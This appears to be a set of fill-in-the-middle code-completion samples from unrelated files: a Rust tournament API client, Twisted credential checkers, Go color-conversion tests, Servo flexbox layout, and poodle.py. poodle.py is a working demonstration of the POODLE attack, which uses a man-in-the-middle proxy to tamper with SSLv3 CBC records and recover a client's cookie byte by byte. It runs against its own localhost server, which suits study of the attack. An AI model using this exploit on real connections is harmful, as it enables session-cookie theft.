impl<'a> TournamentMatchIter<'a> {
    /// Creates new tournament match iter
    pub fn new(
        client: &'a Toornament,
        tournament_id: TournamentId,
        match_id: MatchId,
        with_games: bool,
    ) -> TournamentMatchIter<'a> {
        TournamentMatchIter {
            client,
            tournament_id,
            match_id,
            with_games,
        }
    }
}
/// Modifiers
impl<'a> TournamentMatchIter<'a> {
/// Tournament match lazy editor
pub fn edit<F: 'static + FnMut(Match) -> Match>(self, editor: F) -> TournamentMatchEditor<'a> {
TournamentMatchEditor {
client: self.client,
tournament_id: self.tournament_id,
match_id: self.match_id,
with_games: self.with_games,
editor: Box::new(editor),<|fim▁hole|>
/// Fetch match result
pub fn result(self) -> TournamentMatchResultIter<'a> {
TournamentMatchResultIter {
client: self.client,
tournament_id: self.tournament_id,
match_id: self.match_id,
}
}
/// Return games of this match
pub fn games(self) -> GamesIter<'a> {
GamesIter::new(self.client, self.tournament_id, self.match_id)
}
}
/// Terminators
impl<'a> TournamentMatchIter<'a> {
    /// Fetch the match; errors with `IterError::NoSuchMatch` when the API
    /// returns no match for the (tournament, match) pair.
    pub fn collect<T: From<Match>>(self) -> Result<T> {
        let matches = self.client.matches(
            self.tournament_id.clone(),
            Some(self.match_id.clone()),
            self.with_games,
        )?;
        match matches.0.first() {
            Some(m) => Ok(T::from(m.to_owned())),
            None => Err(Error::Iter(IterError::NoSuchMatch(
                self.tournament_id,
                self.match_id,
            ))),
        }
    }
}

/// A tournament match result iterator
pub struct TournamentMatchResultIter<'a> {
    client: &'a Toornament,
    /// Fetch match of tournament
    tournament_id: TournamentId,
    /// Fetch match with id
    match_id: MatchId,
}

/// Modifiers
impl<'a> TournamentMatchResultIter<'a> {
    /// Tournament match result lazy editor: the closure receives the current
    /// result and returns the edited one; nothing is sent until `update()`.
    pub fn edit<F: 'static + FnMut(MatchResult) -> MatchResult>(
        self,
        editor: F,
    ) -> TournamentMatchResultEditor<'a> {
        TournamentMatchResultEditor {
            client: self.client,
            tournament_id: self.tournament_id,
            match_id: self.match_id,
            editor: Box::new(editor),
        }
    }
}

/// Terminators
impl<'a> TournamentMatchResultIter<'a> {
    /// Fetch the match result
    pub fn collect<T: From<MatchResult>>(self) -> Result<T> {
        Ok(T::from(
            self.client
                .match_result(self.tournament_id, self.match_id)?,
        ))
    }
}
/// A lazy match result editor
pub struct TournamentMatchResultEditor<'a> {
    client: &'a Toornament,
    /// Fetch match of tournament
    tournament_id: TournamentId,
    /// Fetch match with id
    match_id: MatchId,
    /// Match result editor
    editor: Box<dyn FnMut(MatchResult) -> MatchResult>,
}

/// Terminators
impl<'a> TournamentMatchResultEditor<'a> {
    /// Adds or edits the match result: fetches the current result, applies
    /// the stored editor closure, and sends the edited result back.
    pub fn update(mut self) -> Result<MatchResult> {
        let original = self
            .client
            .match_result(self.tournament_id.clone(), self.match_id.clone())?;
        self.client
            .set_match_result(self.tournament_id, self.match_id, (self.editor)(original))
    }
}

/// A lazy tournament match editor
pub struct TournamentMatchEditor<'a> {
    client: &'a Toornament,
    /// Fetch match of tournament
    tournament_id: TournamentId,
    /// Fetch match with id
    match_id: MatchId,
    /// Fetch games with the match
    with_games: bool,
    /// Editor
    editor: Box<dyn FnMut(Match) -> Match>,
}
/// Terminators
impl<'a> TournamentMatchEditor<'a> {
/// Edits the match
pub fn update(mut self) -> Result<Match> {
let matches = self.client.matches(
self.tournament_id.clone(),
Some(self.match_id.clone()),
self.with_games,
)?;
let original = match matches.0.first() {
Some(m) => m.to_owned(),
None => {
return Err(Error::Iter(IterError::NoSuchMatch(
self.tournament_id,
self.match_id,
)))
}
};
self.client
.update_match(self.tournament_id, self.match_id, (self.editor)(original))
}
}<|fim▁end|> | }
} |
<|file_name|>checkers.py<|end_file_name|><|fim▁begin|># -*- test-case-name: twisted.test.test_newcred -*-
from twisted.internet import defer
from twisted.python import components, failure
from twisted.cred import error, credentials
class ICredentialsChecker(components.Interface):
"""I check sub-interfaces of ICredentials.
@cvar credentialInterfaces: A list of sub-interfaces of ICredentials which
specifies which I may check.
"""
def requestAvatarId(self, credentials):
"""
@param credentials: something which implements one of the interfaces in
self.credentialInterfaces.
@return: a Deferred which will fire a string which identifies an
avatar, an empty tuple to specify an authenticated anonymous user
(provided as checkers.ANONYMOUS) or fire a Failure(UnauthorizedLogin).
A note on anonymity - We do not want None as the value for anonymous
because it is too easy to accidentally return it. We do not want the
empty string, because it is too easy to mistype a password file. For
example, an .htpasswd file may contain the lines: ['hello:asdf',
'world:asdf', 'goodbye', ':world']. This misconfiguration will have an
ill effect in any case, but accidentally granting anonymous access is a
worse failure mode than simply granting access to an untypeable
username. We do not want an instance of 'object', because that would<|fim▁hole|>
# Sentinel avatar id for an authenticated anonymous user. An empty tuple is
# used (rather than None or '') so that it cannot be produced by accident.
ANONYMOUS = ()


class AllowAnonymousAccess:
    """A checker that grants access to every IAnonymous credential.

    requestAvatarId always succeeds, identifying the avatar as ANONYMOUS.
    """
    __implements__ = ICredentialsChecker
    credentialInterfaces = credentials.IAnonymous,

    def requestAvatarId(self, credentials):
        return defer.succeed(ANONYMOUS)
class InMemoryUsernamePasswordDatabaseDontUse:
    """An in-memory username/password checker for tests and examples only.

    Passwords are held in plaintext in a dict, hence the "DontUse" name.
    """
    credentialInterfaces = credentials.IUsernamePassword,
    __implements__ = ICredentialsChecker

    def __init__(self):
        # Maps username -> plaintext password.
        self.users = {}

    def addUser(self, username, password):
        """Register (or replace) the plaintext password for a user."""
        self.users[username] = password

    def _cbPasswordMatch(self, matched, username):
        # Callback for credentials.checkPassword(): a truthy match yields the
        # avatar id (the username); otherwise an UnauthorizedLogin failure.
        if matched:
            return username
        else:
            return failure.Failure(error.UnauthorizedLogin())

    def requestAvatarId(self, credentials):
        # NOTE: `in` replaces the deprecated dict.has_key() (removed in
        # Python 3); behavior is identical.
        if credentials.username in self.users:
            return defer.maybeDeferred(
                credentials.checkPassword,
                self.users[credentials.username]).addCallback(
                self._cbPasswordMatch, credentials.username)
        else:
            # Unknown user: fail without revealing whether the user exists.
            return defer.fail(error.UnauthorizedLogin())
""" |
<|file_name|>rgb_test.go<|end_file_name|><|fim▁begin|>package clr
import (
"testing"
)
func TestHSL(t *testing.T) {
tables := []struct {
rgb RGB
h uint16
s uint8<|fim▁hole|> {RGB{R: 165, G: 23, B: 139}, 310, 75, 36},
{RGB{R: 221, G: 132, B: 90}, 19, 65, 60},
{RGB{R: 89, G: 1, B: 55}, 323, 97, 17},
{RGB{R: 132, G: 135, B: 132}, 120, 1, 52},
}
for _, table := range tables {
h, s, l := table.rgb.HSL()
if h-table.h > 1 || table.h-h > 1 {
t.Errorf("H of %v was incorrect, got: %d wanted: %d\n", table.rgb, h, table.h)
}
if s != table.s {
t.Errorf("S of %v was incorrect, got: %d wanted: %d\n", table.rgb, s, table.s)
}
if l != table.l {
t.Errorf("L of %v was incorrect, got: %d wanted: %d\n", table.rgb, l, table.l)
}
}
}
// TestHSV checks RGB.HSV against precomputed hue/saturation/value triples.
// Hue is allowed to be off by one degree (rounding); S and V must be exact.
func TestHSV(t *testing.T) {
	tables := []struct {
		rgb RGB
		h   uint16
		s   uint8
		v   uint8
	}{
		{RGB{R: 78, G: 91, B: 112}, 217, 30, 43},
		{RGB{R: 165, G: 23, B: 139}, 310, 86, 64},
		{RGB{R: 221, G: 132, B: 90}, 19, 59, 86},
		{RGB{R: 89, G: 1, B: 55}, 323, 98, 34},
		{RGB{R: 132, G: 135, B: 132}, 120, 2, 52},
	}

	for _, table := range tables {
		h, s, v := table.rgb.HSV()
		// Unsigned subtraction in both directions tolerates |h - want| <= 1.
		if h-table.h > 1 || table.h-h > 1 {
			t.Errorf("H of %v was incorrect, got: %d wanted: %d\n", table.rgb, h, table.h)
		}
		if s != table.s {
			t.Errorf("S of %v was incorrect, got: %d wanted: %d\n", table.rgb, s, table.s)
		}
		if v != table.v {
			t.Errorf("V of %v was incorrect, got: %d wanted: %d\n", table.rgb, v, table.v)
		}
	}
}
func BenchmarkColorDistance(b *testing.B) {
colors := []RGB{
RGB{R: 78, G: 91, B: 112},
RGB{R: 165, G: 23, B: 139},
RGB{R: 221, G: 132, B: 90},
RGB{R: 89, G: 1, B: 55},
RGB{R: 132, G: 135, B: 132},
}
for i := 0; i < b.N; i++ {
for _, c1 := range colors {
for _, c2 := range colors {
c1.Distance(c2)
}
}
}
}<|fim▁end|> | l uint8
}{
{RGB{R: 78, G: 91, B: 112}, 217, 17, 37}, |
<|file_name|>poodle.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle implementation with a client <--> proxy <--> server
'''
import argparse
import random
import re
import select
import socket
import SocketServer
import ssl
import string
import sys
import struct
import threading
import time
from utils.color import draw
from pprint import pprint
from struct import *
class SecureTCPHandler(SocketServer.BaseRequestHandler):
    # Per-connection handler: wraps the accepted socket in SSLv3 (the
    # protocol under attack) and answers every application record with b'OK'.
    def handle(self):
        self.request = ssl.wrap_socket(self.request, keyfile="cert/localhost.pem", certfile="cert/localhost.pem", server_side=True, ssl_version=ssl.PROTOCOL_SSLv3)
        # loop to avoid broken pipe
        while True:
            try:
                data = self.request.recv(1024)
                if data == '':
                    # Peer closed the connection.
                    break
                self.request.send(b'OK')
            except ssl.SSLError as e:
                # MAC/padding errors are expected while the attacker tampers
                # with records; keep the connection loop alive.
                pass
        return
class Server:
    """The secure server.

    Serves HTTPS (SSLv3) on the given host and port from a daemon thread,
    waiting for the client's requests.
    """

    def __init__(self, host, port):
        self.host = host
        self.port = port

    def connection(self):
        """Start serving in a background daemon thread."""
        SocketServer.TCPServer.allow_reuse_address = True
        self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
        serving_thread = threading.Thread(target=self.httpd.serve_forever)
        serving_thread.setDaemon(True)
        serving_thread.start()
        print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
        return

    def get_host(self):
        return self.host

    def get_port(self):
        return self.port

    def disconnect(self):
        """Stop the serving loop."""
        print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
        self.httpd.shutdown()
        return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])<|fim▁hole|> self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
    """ Assimilate to a MitmProxy

    Serves on its own host/port from a daemon thread and relays traffic to
    the real server through ProxyTCPHandler.
    """

    def __init__(self, host, port):
        self.host = host
        self.port = port

    def connection(self):
        """Start relaying in a background daemon thread."""
        SocketServer.TCPServer.allow_reuse_address = True
        httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
        relay_thread = threading.Thread(target=httpd.serve_forever)
        relay_thread.setDaemon(True)
        relay_thread.start()
        print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
        self.proxy = httpd
        return

    def disconnect(self):
        """Stop the relay loop."""
        print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
        self.proxy.shutdown()
        return
class Poodle(Client):
    """ Assimilate to the attacker

    detect the length of a CBC block
    alter the ethernet frame of the client to decipher a byte regarding the proxy informations
    """

    def __init__(self, client):
        self.client = client
        self.length_block = 0          # CBC block size, discovered at runtime
        self.start_exploit = False     # when True, alter() tampers with frames
        self.decipherable = False      # set by the proxy when padding was accepted
        self.request = ''              # plaintext recovered so far
        self.byte_decipher = 0         # number of bytes recovered (for progress)

    def run(self):
        """Full attack: measure the block size, then decrypt the request."""
        self.client_connection()
        self.size_of_block()
        self.start_exploit = True
        # disconnect the client to avoid "connection reset by peer"
        self.client_disconect()
        print "Start decrypting the request..."
        self.exploit()
        print '\n'
        print draw("%r" %(self.request), bold=True, fg_yellow=True)
        print '\n'
        self.client_disconect()
        return

    def exploit(self):
        """Recover the plaintext block by block, one byte at a time."""
        # start at block 1, finish at block n-2
        # 0 => IV unknow, n => padding block, n-1 => MAC block
        length_f = self.length_frame
        for i in range(1,(length_f/self.length_block) - 1):
            self.current_block = i
            for j in range(self.length_block-1, -1, -1):
                (plain, nb_request) = self.find_plaintext_byte(self.frame,j)
                self.request += plain
                percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
                sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
                sys.stdout.flush()
        return

    def choosing_block(self, current_block):
        # Return the ciphertext bytes of block number `current_block`.
        return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]

    def find_plaintext_byte(self, frame, byte):
        """Repeat the padding-oracle request until the tampered record is
        accepted once (probability ~1/256 per try), then decipher the byte."""
        nb_request = 0
        plain = ""
        print ''
        while True:
            self.client_connection()
            # Shift the path/body padding so the target byte is the last
            # byte of the current block.
            prefix_length = byte
            suffix_length = self.length_block - byte
            self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
            # sleep to avoid "connection reset by peer" on macintosh
            time.sleep(0.0001)
            self.client_disconect()
            if self.decipherable is True:
                self.byte_decipher += 1
                plain = self.decipher(self.frame)
                self.decipherable = False
                break
            nb_request += 1
            sys.stdout.write("\rclient's request %4s" % (nb_request))
            sys.stdout.flush()
        return (chr(plain), nb_request)

    def size_of_block(self):
        """Grow the request one byte at a time until the ciphertext length
        jumps; the jump size is the CBC block size."""
        print "Begins searching the size of a block...\n"
        self.send_request_from_the_client()
        reference_length = self.length_frame
        i = 0
        while True:
            self.send_request_from_the_client(i)
            current_length = self.length_frame
            self.length_block = current_length - reference_length
            if self.length_block != 0:
                # Remember how many pad chars triggered the jump.
                self.nb_prefix = i
                print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
                break
            i += 1
        self.decipherable = False

    def decipher(self, data):
        # POODLE relation: P = C[k-1][-1] XOR C[n-2][-1] XOR (block_len - 1).
        return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)

    def alter(self):
        """Replace the final (padding) block with the target block; called by
        the proxy on each outgoing application record."""
        if self.start_exploit is True:
            self.frame = bytearray(self.frame)
            self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
            return str(self.frame)
        return self.frame

    def set_decipherable(self, status):
        # Proxy callback: the server accepted the tampered record.
        self.decipherable = status
        return

    def set_length_frame(self, data):
        # Proxy callback: remember the latest ciphertext record.
        self.frame = data
        self.length_frame = len(data)

    def client_connection(self):
        self.client.connection()
        return

    def send_request_from_the_client(self, path=0, data=0):
        self.client.request(path,data)
        return

    def client_disconect(self):
        self.client.disconnect()
        return
if __name__ == '__main__':
plan = """\
+-----------------+ +------------+ +-----------+
| +-------> | +--------> | |
| Client | | Proxy | | Server |
| | <-------+ | <--------+ |
+-----------------+ +---+---+----+ +-----------+
| |
^ | |
| +-----v---+------+
| | |
--+----------+ Attacker |
inject javascript | |
+----------------+
"""
parser = argparse.ArgumentParser(description='Connection with SSLv3')
parser.add_argument('host', help='hostname or IP address')
parser.add_argument('port', type=int, help='TCP port number')
parser.add_argument('-v', help='debug mode', action="store_true")
args = parser.parse_args()
print plan + "\n"
server = Server(args.host, args.port)
client = Client(args.host, args.port+1)
spy = Proxy(args.host, args.port+1)
poodle = Poodle(client)
server.connection()
spy.connection()
poodle.run()
spy.disconnect()
server.disconnect()<|fim▁end|> | if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client |
<|file_name|>layout.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at https://mozilla.org/MPL/2.0/. */
use super::geom::{
FlexAxis, FlexRelativeRect, FlexRelativeSides, FlexRelativeVec2, MainStartCrossStart,
};
use super::{FlexContainer, FlexLevelBox};
use crate::context::LayoutContext;
use crate::formatting_contexts::{IndependentFormattingContext, IndependentLayout};
use crate::fragments::{
AbsoluteOrFixedPositionedFragment, BoxFragment, CollapsedBlockMargins, Fragment,
};
use crate::geom::flow_relative::{Rect, Sides, Vec2};
use crate::geom::LengthOrAuto;
use crate::positioned::{AbsolutelyPositionedBox, PositioningContext};
use crate::sizing::ContentSizes;
use crate::style_ext::ComputedValuesExt;
use crate::ContainingBlock;
use atomic_refcell::AtomicRefMut;
use std::cell::Cell;
use style::properties::longhands::align_items::computed_value::T as AlignItems;
use style::properties::longhands::align_self::computed_value::T as AlignSelf;
use style::properties::longhands::box_sizing::computed_value::T as BoxSizing;
use style::properties::longhands::flex_direction::computed_value::T as FlexDirection;
use style::properties::longhands::flex_wrap::computed_value::T as FlexWrap;
use style::values::computed::length::Size;
use style::values::computed::Length;
use style::values::generics::flex::GenericFlexBasis as FlexBasis;
use style::Zero;
// FIMXE: “Flex items […] `z-index` values other than `auto` create a stacking context
// even if `position` is `static` (behaving exactly as if `position` were `relative`).”
// https://drafts.csswg.org/css-flexbox/#painting
// (likely in `display_list/stacking_context.rs`)
/// Layout parameters and intermediate results about a flex container,
/// grouped to avoid passing around many parameters
struct FlexContext<'a> {
    layout_context: &'a LayoutContext<'a>,
    positioning_context: &'a mut PositioningContext,
    containing_block: &'a ContainingBlock<'a>, // For items
    /// Whether the container lays out on a single line
    /// (presumably derived from `flex-wrap` — confirm at construction site).
    container_is_single_line: bool,
    /// Resolved `min-*` constraint on the container's cross size.
    container_min_cross_size: Length,
    /// Resolved `max-*` constraint on the container's cross size, if any.
    container_max_cross_size: Option<Length>,
    /// Which flow axis is the flex main axis (row vs. column).
    flex_axis: FlexAxis,
    /// Mapping between flex-relative sides and flow-relative sides.
    main_start_cross_start_sides_are: MainStartCrossStart,
    /// Definite inner main/cross sizes of the container, where known.
    container_definite_inner_size: FlexRelativeVec2<Option<Length>>,
    /// The container's computed `align-items` value.
    align_items: AlignItems,
}
/// A flex item with some intermediate results
struct FlexItem<'a> {
    /// The item's independent formatting context (its layout machinery).
    box_: &'a mut IndependentFormattingContext,
    /// Position of this box in document order (used for fragment ordering).
    tree_rank: usize,
    /// Computed box size in flex-relative axes; `Auto` when unspecified.
    content_box_size: FlexRelativeVec2<LengthOrAuto>,
    /// Resolved min-size constraints in flex-relative axes.
    content_min_size: FlexRelativeVec2<Length>,
    /// Resolved max-size constraints in flex-relative axes, where present.
    content_max_size: FlexRelativeVec2<Option<Length>>,
    padding: FlexRelativeSides<Length>,
    border: FlexRelativeSides<Length>,
    margin: FlexRelativeSides<LengthOrAuto>,

    /// Sum of padding, border, and margin (with `auto` assumed to be zero) in each axis.
    /// This is the difference between an outer and inner size.
    pbm_auto_is_zero: FlexRelativeVec2<Length>,

    /// https://drafts.csswg.org/css-flexbox/#algo-main-item
    flex_base_size: Length,

    /// https://drafts.csswg.org/css-flexbox/#algo-main-item
    hypothetical_main_size: Length,
    /// This is `align-self`, defaulting to `align-items` if `auto`
    align_self: AlignItems,
}
/// A flex line with some intermediate results
struct FlexLine<'a> {
    /// The items that were placed on this line
    items: &'a mut [FlexItem<'a>],
    /// Sum of the items’ outer hypothetical main sizes
    /// (hypothetical main size plus main-axis padding, border, and margin)
    outer_hypothetical_main_sizes_sum: Length,
}
/// Return type of `FlexItem::layout`
struct FlexItemLayoutResult {
    /// https://drafts.csswg.org/css-flexbox/#algo-cross-item
    hypothetical_cross_size: Length,
    /// Fragments produced by laying out the item’s contents
    fragments: Vec<Fragment>,
    /// Hoisted boxes collected during this layout pass; appended to the
    /// container’s positioning context once this pass is kept
    positioning_context: PositioningContext,
}
/// Return type of `FlexLine::layout`
struct FlexLineLayoutResult {
    /// Used cross size of the line
    cross_size: Length,
    item_fragments: Vec<BoxFragment>, // One per flex item, in the given order
}
impl FlexContext<'_> {
    /// Convert a flow-relative vector into flex-relative (main/cross) axes
    fn vec2_to_flex_relative<T>(&self, x: Vec2<T>) -> FlexRelativeVec2<T> {
        self.flex_axis.vec2_to_flex_relative(x)
    }
    /// Convert flow-relative sides into flex-relative sides
    fn sides_to_flex_relative<T>(&self, x: Sides<T>) -> FlexRelativeSides<T> {
        self.main_start_cross_start_sides_are
            .sides_to_flex_relative(x)
    }
    /// Convert flex-relative sides back into flow-relative sides
    fn sides_to_flow_relative<T>(&self, x: FlexRelativeSides<T>) -> Sides<T> {
        self.main_start_cross_start_sides_are
            .sides_to_flow_relative(x)
    }
    /// Convert a flex-relative rect into a flow-relative one,
    /// positioned inside a base rect of the given size
    fn rect_to_flow_relative(
        &self,
        base_rect_size: FlexRelativeVec2<Length>,
        rect: FlexRelativeRect<Length>,
    ) -> Rect<Length> {
        super::geom::rect_to_flow_relative(
            self.flex_axis,
            self.main_start_cross_start_sides_are,
            base_rect_size,
            rect,
        )
    }
    /// Resolve an item’s `align-self`, falling back to the container’s
    /// `align-items` for the `auto` value
    fn align_for(&self, align_self: &AlignSelf) -> AlignItems {
        match align_self {
            AlignSelf::Auto => self.align_items,
            AlignSelf::Stretch => AlignItems::Stretch,
            AlignSelf::FlexStart => AlignItems::FlexStart,
            AlignSelf::FlexEnd => AlignItems::FlexEnd,
            AlignSelf::Center => AlignItems::Center,
            AlignSelf::Baseline => AlignItems::Baseline,
        }
    }
}
impl FlexContainer {
    pub fn inline_content_sizes(&self) -> ContentSizes {
        // FIXME: implement this. The spec for it is the same as for "normal" layout:
        // https://drafts.csswg.org/css-flexbox/#layout-algorithm
        // … except that the parts that say “the flex container is being sized
        // under a min or max-content constraint” apply.
        ContentSizes::zero() // Return an incorrect result rather than panic
    }
    /// https://drafts.csswg.org/css-flexbox/#layout-algorithm
    pub(crate) fn layout(
        &self,
        layout_context: &LayoutContext,
        positioning_context: &mut PositioningContext,
        containing_block: &ContainingBlock,
        tree_rank: usize,
    ) -> IndependentLayout {
        // Actual length may be less, but we guess that usually not by a lot
        let mut flex_items = Vec::with_capacity(self.children.len());
        // Absolutely-positioned children of the flex container may be interleaved
        // with flex items. We need to preserve their relative order for correct painting order,
        // which is the order of `Fragment`s in this function’s return value.
        //
        // Each child is recorded as either:
        // * `Ok(_)`: an absolutely-positioned box, kept in place, or
        // * `Err(())`: a placeholder for a flex item; the mutable borrow of the
        //   item itself is collected separately into `flex_items`.
        let original_order_with_absolutely_positioned = self
            .children
            .iter()
            .enumerate()
            .map(|(tree_rank, arcrefcell)| {
                let borrowed = arcrefcell.borrow_mut();
                match &*borrowed {
                    FlexLevelBox::OutOfFlowAbsolutelyPositionedBox(absolutely_positioned) => {
                        Ok(absolutely_positioned.clone())
                    },
                    FlexLevelBox::FlexItem(_) => {
                        // Narrow the borrow to the item itself so it can be held
                        // across the call to `layout` below.
                        let item = AtomicRefMut::map(borrowed, |child| match child {
                            FlexLevelBox::FlexItem(item) => item,
                            _ => unreachable!(),
                        });
                        flex_items.push((tree_rank, item));
                        Err(())
                    },
                }
            })
            .collect::<Vec<_>>();
        // The closure below cannot return the block size directly,
        // so it is smuggled out through this binding.
        let mut content_block_size_option_dance = None;
        let fragments =
            positioning_context.adjust_static_positions(tree_rank, |positioning_context| {
                let (mut flex_item_fragments, content_block_size) = layout(
                    layout_context,
                    positioning_context,
                    containing_block,
                    flex_items
                        .iter_mut()
                        .map(|(tree_rank, child)| (*tree_rank, &mut **child)),
                );
                content_block_size_option_dance = Some(content_block_size);
                let fragments = original_order_with_absolutely_positioned
                    .into_iter()
                    .enumerate()
                    .map(|(tree_rank, child_as_abspos)| match child_as_abspos {
                        Err(()) => {
                            // The `()` here is a place-holder for a flex item.
                            // The `flex_item_fragments` iterator yields one fragment
                            // per flex item, in the original order.
                            Fragment::Box(flex_item_fragments.next().unwrap())
                        },
                        Ok(absolutely_positioned) => {
                            let position = absolutely_positioned
                                .borrow()
                                .context
                                .style()
                                .clone_position();
                            let hoisted_box = AbsolutelyPositionedBox::to_hoisted(
                                absolutely_positioned,
                                Vec2::zero(),
                                tree_rank,
                                containing_block,
                            );
                            let hoisted_fragment = hoisted_box.fragment.clone();
                            positioning_context.push(hoisted_box);
                            Fragment::AbsoluteOrFixedPositioned(AbsoluteOrFixedPositionedFragment {
                                hoisted_fragment,
                                position,
                            })
                        },
                    })
                    .collect::<Vec<_>>();
                // There should be no more flex items
                assert!(flex_item_fragments.next().is_none());
                fragments
            });
        IndependentLayout {
            fragments,
            content_block_size: content_block_size_option_dance.unwrap(),
        }
    }
}
/// Lay out the given flex items within the given containing block.
///
/// Return one fragment for each flex item, in the provided order, and the used block-size.
fn layout<'context, 'boxes>(
    layout_context: &LayoutContext,
    positioning_context: &mut PositioningContext,
    containing_block: &ContainingBlock,
    flex_item_boxes: impl Iterator<Item = (usize, &'boxes mut IndependentFormattingContext)>,
) -> (impl Iterator<Item = BoxFragment>, Length) {
    // FIXME: get actual min/max cross size for the flex container.
    // We have access to style for the flex container in `containing_block.style`,
    // but resolving percentages there requires access
    // to the flex container’s own containing block which we don’t have.
    // For now, use incorrect values instead of panicking:
    let container_min_cross_size = Length::zero();
    let container_max_cross_size = None;
    let flex_container_position_style = containing_block.style.get_position();
    let flex_wrap = flex_container_position_style.flex_wrap;
    let flex_direction = flex_container_position_style.flex_direction;
    // Column flex containers are not fully implemented yet,
    // so give a different layout instead of panicking.
    // FIXME: implement `todo!`s for FlexAxis::Column below, and remove this
    let flex_direction = match flex_direction {
        FlexDirection::Row | FlexDirection::Column => FlexDirection::Row,
        FlexDirection::RowReverse | FlexDirection::ColumnReverse => FlexDirection::RowReverse,
    };
    // Reuse the `flex_wrap` value fetched above rather than re-reading the style.
    let container_is_single_line = match flex_wrap {
        FlexWrap::Nowrap => true,
        FlexWrap::Wrap | FlexWrap::WrapReverse => false,
    };
    let flex_axis = FlexAxis::from(flex_direction);
    let flex_wrap_reverse = match flex_wrap {
        FlexWrap::Nowrap | FlexWrap::Wrap => false,
        FlexWrap::WrapReverse => true,
    };
    let align_items = containing_block.style.clone_align_items();
    let mut flex_context = FlexContext {
        layout_context,
        positioning_context,
        containing_block,
        container_min_cross_size,
        container_max_cross_size,
        container_is_single_line,
        flex_axis,
        align_items,
        main_start_cross_start_sides_are: MainStartCrossStart::from(
            flex_direction,
            flex_wrap_reverse,
        ),
        // https://drafts.csswg.org/css-flexbox/#definite-sizes
        container_definite_inner_size: flex_axis.vec2_to_flex_relative(Vec2 {
            inline: Some(containing_block.inline_size),
            block: containing_block.block_size.non_auto(),
        }),
    };
    let mut flex_items = flex_item_boxes
        .map(|(tree_rank, box_)| FlexItem::new(&flex_context, box_, tree_rank))
        .collect::<Vec<_>>();
    // “Determine the main size of the flex container”
    // https://drafts.csswg.org/css-flexbox/#algo-main-container
    let container_main_size = match flex_axis {
        FlexAxis::Row => containing_block.inline_size,
        FlexAxis::Column => {
            // FIXME “using the rules of the formatting context in which it participates”
            // but if block-level with `block-size: max-auto` that requires
            // layout of the content to be fully done:
            // https://github.com/w3c/csswg-drafts/issues/4905
            // Gecko reportedly uses `block-size: fit-content` in this case
            // (which requires running another pass of the "full" layout algorithm)
            todo!()
            // Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
            // forces `FlexAxis::Row`.
        },
    };
    // “Resolve the flexible lengths of all the flex items to find their *used main size*.”
    // https://drafts.csswg.org/css-flexbox/#algo-flex
    let flex_lines = collect_flex_lines(
        &mut flex_context,
        container_main_size,
        &mut flex_items,
        |flex_context, mut line| line.layout(flex_context, container_main_size),
    );
    // https://drafts.csswg.org/css-flexbox/#algo-cross-container
    let container_cross_size = flex_context
        .container_definite_inner_size
        .cross
        .unwrap_or_else(|| {
            flex_lines
                .iter()
                .map(|line| line.cross_size)
                .sum::<Length>()
        })
        .clamp_between_extremums(
            flex_context.container_min_cross_size,
            flex_context.container_max_cross_size,
        );
    // https://drafts.csswg.org/css-flexbox/#algo-line-align
    let mut cross_start_position_cursor = Length::zero();
    let line_cross_start_positions = flex_lines
        .iter()
